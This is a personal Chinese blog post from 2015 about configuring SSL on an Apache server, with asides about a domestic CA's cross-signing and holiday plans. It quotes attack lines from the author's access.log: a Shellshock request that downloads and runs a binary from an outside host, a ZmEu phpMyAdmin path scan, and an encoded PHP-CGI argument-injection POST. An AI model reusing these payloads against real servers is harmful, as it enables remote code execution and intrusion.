只是又犯了下2病:)

一晃又是几个月过去了。今天是2月13号(这日子怎么怪怪的,2月13,213,2B.。。。) 还没从博客挂SSL证书后回过神来。这几天各种写PHP,各种调apache,各种折腾Ubuntu,反正就是瞎折腾。你看嘛,给项目写了一堆的函数库,结果到后面API用的根本不是函数库的东西,全部要重写;心血来潮给自己的另一个服务器配了个SSL证书(不用想了,我等土鳖没钱只能用沃通的免费证书 = = )装逼,各种折腾APACHE,伪静态强制HTTPS,又是改规则,又是改加密强度和方式的,还想一台服务器开几个HTTPS站,搞到最后发现除了主站地址其他的全部跑到pma去了,自然是只能作罢;然后晚上11点的时候发现自己挂了SSL的那台主机貌似被人测(gong)试(ji)安(lou)全(dong)了,access.log里面各种奇怪的玩意儿

108.61.212.127 - - [10/Feb/2015:01:34:43 +0800] “GET /cgi-bin/bash HTTP/1.1” 302 514 “-“ “() { :;};/usr/bin/perl -e ‘print “Content-Type: text/plainrnrnXSUCCESS!”;system(“wget http://play.marketplay.eu/apache23 -O /tmp/apache23;curl -O /tmp/apache23 http://play.marketplay.eu/apache23;chmod 777 /tmp/apache23;cd /tmp/;./apache23 &”);’”

还有更蛋疼的

173.236.125.26 - - [03/Feb/2015:05:09:00 +0000] “GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1” 302 572 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:00 +0000] “GET /scripts/setup.php HTTP/1.1” 302 524 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:01 +0000] “GET /admin/scripts/setup.php HTTP/1.1” 302 536 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:01 +0000] “GET /admin/pma/scripts/setup.php HTTP/1.1” 302 544 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:02 +0000] “GET /admin/phpmyadmin/scripts/setup.php HTTP/1.1” 302 558 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:02 +0000] “GET /db/scripts/setup.php HTTP/1.1” 302 530 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:02 +0000] “GET /dbadmin/scripts/setup.php HTTP/1.1” 302 540 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:03 +0000] “GET /myadmin/scripts/setup.php HTTP/1.1” 302 540 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:03 +0000] “GET /mysql/scripts/setup.php HTTP/1.1” 302 536 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:03 +0000] “GET /mysqladmin/scripts/setup.php HTTP/1.1” 302 546 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:04 +0000] “GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1” 302 558 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:04 +0000] “GET /phpadmin/scripts/setup.php HTTP/1.1” 302 542 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:05 +0000] “GET /phpMyAdmin/scripts/setup.php HTTP/1.1” 302 546 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:05 +0000] “GET /phpmyadmin/scripts/setup.php HTTP/1.1” 302 546 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:05 +0000] “GET /phpmyadmin1/scripts/setup.php HTTP/1.1” 302 548 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:06 +0000] “GET /phpmyadmin2/scripts/setup.php HTTP/1.1” 302 548 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:06 +0000] “GET /pma/scripts/setup.php HTTP/1.1” 302 532 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:07 +0000] “GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1” 302 554 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:07 +0000] “GET /xampp/phpmyadmin/scripts/setup.php HTTP/1.1” 302 558 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:07 +0000] “GET /web/scripts/setup.php HTTP/1.1” 302 532 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:08 +0000] “GET /php-my-admin/scripts/setup.php HTTP/1.1” 302 550 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:08 +0000] “GET /websql/scripts/setup.php HTTP/1.1” 302 538 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:08 +0000] “GET /phpmyadmin/scripts/setup.php HTTP/1.1” 302 546 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:09 +0000] “GET /phpMyAdmin/scripts/setup.php HTTP/1.1” 302 546 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:09 +0000] “GET /phpMyAdmin-2/scripts/setup.php HTTP/1.1” 302 550 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:10 +0000] “GET /php-my-admin/scripts/setup.php HTTP/1.1” 302 550 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:10 +0000] “GET /phpMyAdmin-2.5.5/index.php HTTP/1.1” 302 542 “-“ “ZmEu” 173.236.125.26 - - [03/Feb/2015:05:09:10 +0000] “GET /phpMyAdmin-2.5.5-pl1/index.php HTTP/1.1” 302 550 “-“ “ZmEu”

至于下面这个机器脚本。。。。。

198.154.63.131 - - [03/Feb/2015:06:47:55 +0000] “POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+ %2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73 %69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74 %69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+ %2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69 %6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+ %2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+ %2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69 %6E%70%75%74+%2D%6E HTTP/1.1” 302 2642 “-“ “-“

我只想说,哥们儿,您老POST还URL Encode 一次,有必要嘛。。。。。别说正常的,您这不正常的换个傻子管理员都知道不太对啊喂 您这是在智商压制咩 = =||| 一群外国人,不远万里,大半夜造访我的服务器,留下一堆神秘的请求和User-Agent,测试我服务器的安全性,这是一种怎样的精神?这是一种国际主义精神,是一种毫不利己,专门利人的奉献精神!这是一群高尚的人,一群纯粹的人,一群有道德的人,一群脱离了低级趣味的人,一群有益于人民的人! 咳咳。。。扯远了 话说回来,为了增(geng)强(hao)数(de)据(qu)安(zhuang)全(bi),给自己的另一个网站挂了个SSL证书,国产CA良心了下。。。 不过。。。 我倒是挺醉的,买别人的根CA给自己的根证书交叉签名,活生生把自己的顶级根变成中级根是闹哪样 = = 还是说我真的too young too simple 不知道其中的玄机咩。。。。。。但愿是后者,嗯。 反正感觉证书从顶级根变成中级根就挺怪的。。。你自己家的EV SSL证书在浏览器都不是绿的了。。。跟国外的EV根本不像啊。。。。。 浏览器根本不拿你家EV当EV好嘛!!!!!!【笑哭】 shen me gui !!! 所以很正常的。。。我的网站刚挂上去Chrome就毫不客气给了把灰锁。。。。。 谷歌说什么证书时间超过2016年的就会这样,实际情况就是我之前说的。。。。。。。 这都是闹哪样啊 - - kebe liu 看到我挂了个SSL他也去拿了个SSL装逼,至于这人装逼有多艰辛嘛。。。。还是看他自己说的吧。。。 醉了醉了 寒假都过去这么十几天了,我做了些啥我都不知,只记得陪了小凤十几天,然后。。。说好的教她JAVA也没有教完,到了OO部分根本说不下去啊喂概念用文字叙述还是相当要功夫的 T T 何况她下学期OO JAVA还是某上课要学生背英语段落的计算机老师教的,我真的有点不放心。 哎 = = 年关将至,不管了。安安心心过个年吧。:)今年滚去上海过年 话说回来,自打初一完了离开上海之后,这都7年了我没去过上海了。 愿回上海去看看老朋友的时候一切依旧。 老子胡汉三又回来了!^_^